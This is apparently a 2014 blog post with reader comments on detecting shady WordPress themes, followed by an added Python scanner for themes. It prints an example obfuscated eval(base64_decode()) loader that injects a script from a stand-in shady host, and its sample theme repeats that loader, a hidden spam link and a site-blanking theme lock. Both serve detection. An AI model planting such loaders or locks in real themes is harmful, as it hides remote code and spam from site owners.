How to Make Sure You’re Not Using a Shady WordPress Theme

Aug 1 2014 by Karol K | 12 Comments

I can still remember how excited I was back in 2008 when I first discovered WordPress (late-adopter, I know).

What was particularly impressive for me was that I could change the designs of my WordPress sites with minimal effort.

And so the hunt for the perfect theme began!

As far as I can recall, there weren’t that many paid/premium themes back then. And, to be honest, I wasn’t even taking the possibility of paying for a theme into consideration (since money was a bit tight) so I was kind of stuck with free themes by default.

All was well for a while. My test sites and personal blogs were running just fine, until, one day, I noticed some strange links in the footer.

Those unusual links pointed not only to the theme creator’s site, but also to some questionable sites that had spammy anchor texts like "pay day loan", "cheap home insurance", "seo services", and so forth.

No problem, I thought, removing these should only take a minute.

But, to my surprise, those links were neither in the theme’s Widgets screen nor anywhere in the theme’s source code.

I searched all of the theme’s files in bulk with a source code editor, looking for those anchor texts.

I even went through the database using a SQL SELECT statement.

Nothing.

So how was it possible for these links to remain under the radar?

Well, as it turns out, this is the story of my first encounter with encrypted code in WordPress themes.

Shady WordPress theme practices

Encrypted code is just one piece of the puzzle; there are other distasteful WordPress theme development practices going on.

Static links pointing to suspicious websites

Not all static links (or embedded links) in WordPress themes are bad.

A lot of times, they are just links that credit the developer of the theme. As long as the links point somewhere legitimate, and the theme user is told up front that they will appear on the site, they are acceptable.

However, in some instances, they may be going to spammy websites. When links start pointing to casino sites, online pharmacies or some shady biz-op products, all without the site owner’s knowledge, then it’s a different story.

Search engines simply won’t be pleased to find out that your site is linking to the dark side of the internet, and they may penalize you for it even if you’re an unwitting participant.

Theme-locking

Some links and code blocks in shady WordPress themes are "locked in" with JavaScript and/or PHP: the theme checks at runtime that the link or block is still present. Removing it makes the entire WordPress site go blank, replacing your content with a message telling you that you need to put the links/code blocks back in place to make the message go away.

Encrypted code

Encrypted code is the term the WordPress community uses for code snippets that are deliberately obfuscated from the user of the theme. It is not encryption in the cryptographic sense: typically the code is base64-encoded, compressed or otherwise mangled, and then decoded and handed to eval() at runtime. Anyone can decode it, but the intent is to hide portions of the theme's source code and to make those portions hard to find and remove. Encrypted code can do a variety of things, such as generating links to third-party sites, loading remote scripts and interfering with the user experience.

Why these things are happening

Some companies go out of their way to include harmful elements in their WordPress themes.

Why would they do this, you might ask? Because WordPress themes are a great online marketing tool.

The market for themes keeps growing year over year. It’s been reported that 18.9 percent of all sites are built with WordPress. And, at one point, all those site owners will go out looking for nice themes.

The way some people capitalize on this opportunity is by creating a great-looking WordPress theme and then including hidden links and obfuscated code in the theme.

Imagine what their reach could be like if they get even a few hundred domains installing their theme.

How to make sure you’re using a trustworthy theme

If you’re considering the use of a new WordPress theme, below are some steps that can help you stay out of trouble.

Of course, the best first option is to use a theme obtained from a reputable source and created by a trustworthy theme developer, both of which significantly reduce the chance of these shady practices being employed. It wouldn't hurt to go through these steps regardless of the reputation of your candidate theme.

Step 1: Install theme-checking plugins

You can investigate a theme by hand by reading through its files, but doing so with a scanning plugin is much quicker and less likely to miss something.

You’ll need two plugins for this step.

  1. TAC (Theme Authenticity Checker) scans all of your installed WordPress themes for potentially malicious code and static links.
  2. Theme-Check tests your themes for compliance with the WordPress theme review standards and best practices.

Both are static scanners: they search the theme's files for known patterns rather than running the theme, so a clean result means only that none of those patterns turned up.

Step 2: Test the theme for encrypted code

Before activating a WordPress theme, you should first test it in a safe development environment, such as a local WordPress install on your own PC. If you don't have time for that, you should still be fine on a live site as long as you only upload the theme and do not activate it (or open it in Live Preview, which also loads the theme's PHP) before running your tests.

To see what the TAC plugin has to say about your new theme, in the WordPress administration screen, go to Appearance > TAC.

Scroll down to your theme to see if there are any issues.

Screenshot of a TAC test result.

If TAC says that everything's fine (and you're using a theme from a trusted source) then it probably is, bearing in mind that it matches known patterns rather than proving the theme clean.

However, if it indicates the presence of any encrypted code then you need to be cautious.

It’s recommended to never use themes that have encrypted code. The main reason for this is that you have absolutely no control over what’s inside the encrypted block of code. It could be anything: third-party scripts, data-mining, ads, link-building schemes, etc.

The PHP and JavaScript functions that show up in encrypted code all have benign uses, such as decoding data, decompressing payloads or parsing. But a theme's job is to render HTML, so there is rarely a reason for a theme to decode and execute strings at runtime; in the context of WordPress theme development these functions are most often used to hide shady source code.

If you want to do some sniffing around on your own, you can batch-search theme files with a text editor like Notepad++ (or grep). Look for the keywords "base64_decode" and "eval".

The base64_decode() PHP function, together with the eval() function, is the classic pair used to execute encrypted code: the hidden payload sits in a base64 string and eval() runs whatever it decodes to. Related functions worth searching for are gzinflate(), gzuncompress(), str_rot13() and create_function(), which serve the same purpose.

For example, if the encrypted code you find looks anything like this (just an example, not actual code), stay away. The payload is split across two base64 strings that are only concatenated at runtime, so searching the theme for the URL or the script tag finds nothing; joined and decoded they produce '<script src="//a-shady-site.com/js/spamlinks.js" type="text/javascript"></script>', which gets written into the page:

<?php
$o="eHQvamF2YXNjcmlwdCI+PC9zY3JpcHQ+"; // second half of the payload, kept apart from the first
eval("?>" . base64_decode("PHNjcmlwdCBzcmM9Ii8vYS1zaGFkeS1zaXRlLmNvbS9qcy9zcGFtbGlua3MuanMiIHR5cGU9InRl" . $o)); // "?>" leaves PHP mode so the decoded HTML is emitted

Step 3: Evaluate all the static links

TAC will also let you know when it stumbles upon any static links inside the theme. When you click the Details button, you will see the exact files and lines where those links occur.

Find embedded static links with TAC.

Static links are common in free WordPress themes, and they're not necessarily bad. For instance, some themes require attribution. The first thing to do is decide whether you're okay with those links being on your site; if you're not okay with any of them, don't use the theme.

When it comes to static links, most of the time the action is in the footer.php file.

For instance, the theme I checked when doing research for this piece had links pointing to a site titled "Botox Tel Aviv" with an anchor text consisting entirely of non-Latin characters:

An example of an embedded static link in a WordPress theme.

For testing purposes, you can check what happens if you remove an embedded link. Sometimes you'll discover that your entire site stops working as a result. That is exactly what happened to my test site: when I removed the link, the site stopped working and the content was replaced with this message:

The message being displayed on all pages when a static link is removed.

If you want to investigate some more, this is where the other plugin, Theme-Check, comes into play.

Go to Appearance > Theme Check and run a test for the theme in question. Most likely, the plugin will report a lot of findings, so you will have to browse around for a while to find what might be causing the problem.

In my case, the instructions found in line 124 of the functions.php file were to blame:

Theme-check finding a WordPress theme error.
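Both checks above, Step 2's search for eval()/base64_decode() and Step 3's inventory of static links and lock code, can be scripted. The scanner below is an added example written for this page; it is not code from TAC, Theme-Check or the article's author. It walks a theme directory, flags obfuscation functions, decodes any long base64 literals to show what they hide, lists every third-party host referenced (including hosts that only appear inside decoded payloads), flags CSS that hides links, and points at code that reads the theme's own files or calls wp_die()/die(), which is the shape of a theme lock. The sample theme it scans is constructed for the example: the hostnames in it (example-theme-maker.test, cheap-loans.test, a-shady-site.com) are placeholders, and its file_get_contents()/wp_die() lock is an illustration of the pattern the article describes, not the code of the theme the article examined.

```python
"""Heuristic scan of a WordPress theme directory for obfuscated code,
static third-party links and theme-locking kill switches.
Example code added for this page; not TAC or Theme-Check."""
import base64
import os
import re
import tempfile

# Constructed sample theme (not a real theme).  The footer mixes a harmless
# credit link, a hidden spam link and an eval(base64_decode(...)) block;
# functions.php blanks the site when the spam link is removed (theme lock).
SAMPLE_THEME = {
    "footer.php": (
        '<footer>\n'
        '<a href="http://example-theme-maker.test/">Theme by Example</a>\n'
        '<a href="http://cheap-loans.test/" style="display:none">payday loan</a>\n'
        '<?php $o="eHQvamF2YXNjcmlwdCI+PC9zY3JpcHQ+";\n'
        'eval("?>" . base64_decode("PHNjcmlwdCBzcmM9Ii8vYS1zaGFkeS1zaXRlLmNvbS9qcy9z'
        'cGFtbGlua3MuanMiIHR5cGU9InRl" . $o)); ?>\n'
        '</footer>\n'
    ),
    "functions.php": (
        '<?php\n'
        'add_theme_support("post-thumbnails");\n'
        '$footer = file_get_contents(get_template_directory() . "/footer.php");\n'
        'if (strpos($footer, "cheap-loans.test") === false) {\n'
        '    wp_die("Please restore the footer links.");\n'
        '}\n'
    ),
}

# Functions and constructs typically used to hide code from the theme user.
OBFUSCATION = re.compile(
    r"\b(?:eval|base64_decode|gzinflate|gzuncompress|str_rot13|create_function)\s*\("
    r"|preg_replace\s*\(\s*['\"][^'\"]*e['\"]"   # /e modifier: pattern string ending in e
    r"|(?:\\x[0-9a-fA-F]{2}){8,}"                 # long runs of hex-escaped bytes
)
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/]{20,}={0,2})['\"]")
EXTERNAL_HOST = re.compile(r"(?:https?:)?//([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)
HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden|text-indent\s*:\s*-\d", re.I)
SELF_INSPECT = re.compile(
    r"(?:file_get_contents|fopen|md5_file|filesize)\s*\([^;]*(?:footer|header|sidebar|index)\.php")
KILL_SWITCH = re.compile(r"\b(?:wp_die|die|exit)\s*\(")


def decode_b64_literals(line):
    """Decode base64 string literals on a line; return those that decode to
    readable text (hidden HTML or PHP).  Binary-looking results are skipped."""
    decoded = []
    for lit in B64_LITERAL.findall(line):
        try:
            raw = base64.b64decode(lit, validate=True)
        except ValueError:
            continue
        if raw and all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded


def scan_theme(root):
    """Walk a theme directory and collect findings as (file, line, detail)."""
    findings = {"obfuscation": [], "decoded": [], "hosts": [], "hidden": [], "lock": []}
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            if not name.endswith((".php", ".js")):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for no, line in enumerate(fh, 1):
                    for m in OBFUSCATION.finditer(line):
                        findings["obfuscation"].append((rel, no, m.group(0)))
                    texts = decode_b64_literals(line)
                    for text in texts:
                        findings["decoded"].append((rel, no, text))
                    # Hosts in the raw line and in anything the literals decode to.
                    for text in [line] + texts:
                        for host in EXTERNAL_HOST.findall(text):
                            findings["hosts"].append((rel, no, host.lower()))
                    if HIDDEN.search(line):
                        findings["hidden"].append((rel, no, line.strip()))
                    if SELF_INSPECT.search(line):
                        findings["lock"].append((rel, no, "theme reads its own files"))
                    if KILL_SWITCH.search(line):
                        findings["lock"].append((rel, no, "kill switch: " + line.strip()))
    return findings


def build_sample_theme():
    """Write the constructed sample theme to a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="sample-theme-")
    for name, body in SAMPLE_THEME.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_theme()
    for kind, items in scan_theme(target).items():
        for rel, no, detail in items:
            print(f"{kind:12} {rel}:{no}  {detail}")
```

Run it with a theme directory as the argument (for example wp-content/themes/candidate); with no argument it scans the built-in sample, where the decoded base64 exposes the script tag pointing at a-shady-site.com even though that host appears nowhere in the files as text. Like TAC, it is a pattern matcher: a clean run means none of these patterns appeared, not that the theme is safe, and a legitimate credit link will show up in the host list too, since deciding which links you accept is still your call.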

Conclusion

The moral of the story is that you should choose WordPress themes carefully. Before using any theme, it’s best to perform some research and testing on it.


About the Author

Karol K is a blogger who’s passionate about WordPress. He works with ThemeIsle, a WordPress theme development company. His work has been published all over the Web, on sites like Web Design Ledger, Quick Sprout, ProBlogger, and others. Reach him at @carlosinho.

12 Comments

Jason W.

August 1st, 2014

I believe I once had it explained to me, that all content created for WordPress must adhere to the licensing of WordPress? So wouldn’t encrypted code in a theme violate WordPress’ Terms of Service/Use?

Eric

August 1st, 2014

Encrypted code??? That’s laughable at best. Maybe obfuscated but not encrypted.

Niki Singh

August 4th, 2014

Thanks for the idea to use TAC Scan. I found some scripts last month on a client's website; he was updating his WordPress website on his own. When I looked at the Google search results for the website, they were showing some casino-related description. The code was actually found in the footer.php file and it took almost an hour to figure out the issue. TAC scan is a nice plugin to solve this problem.

Coalesceideas

August 5th, 2014

I had the same experience and eagerness back in those days, and the links that were included in the theme I was using were there for almost 2 years; then TAC came to the rescue.

Mustafa Gaziani

August 5th, 2014

Hey Karol,

Yes! It's true that not all static links are bad. But it can't be denied that some are.

Thanks for sharing these useful plugins. I hadn't heard about these plugins before, and didn't even know that it was possible to check for this.

You provided a very useful step-by-step tutorial with pics. I like your effort.

Regards,
Mustafa

Marshall

August 7th, 2014

Thanks for posting this. Good article. I have tried out both plugins on a test site running two production themes. No encrypted code but some links.

Good plugins to know about. I will add them to my must have list.

Lizzy

August 15th, 2014

Very useful article, Thanks! I will be sure to use those plugins to test sites from now on. Do you think a security plugin, like iThemes, can block spammy links?

Anuj Sharma

August 16th, 2014

I never thought something like this would ever exist. Karol, thanks for putting up this article. Really informative.

Karol

August 23rd, 2014

@Jason That is true, every piece of code you release for WordPress has to be under the standard WordPress license. But I’m not quite sure about encrypted code being a violation. In my opinion (although I’m no legal expert), the fact that the code is encrypted doesn’t make it different from any other piece of code. You can still modify it (with some effort), and you can still go around it.

Karol

August 23rd, 2014

@Niki Yeah, those things can become serious if you’re not careful. And sometimes they’re quite difficult to spot, especially if the links are the exact color as the background.

Karol

August 23rd, 2014

@Lizzy Blocking spammy links for good is rather difficult. You’re probably better off doing individual scans and taking action if anything suspicious pops up.

Karol

August 23rd, 2014

Thanks for the comments guys!
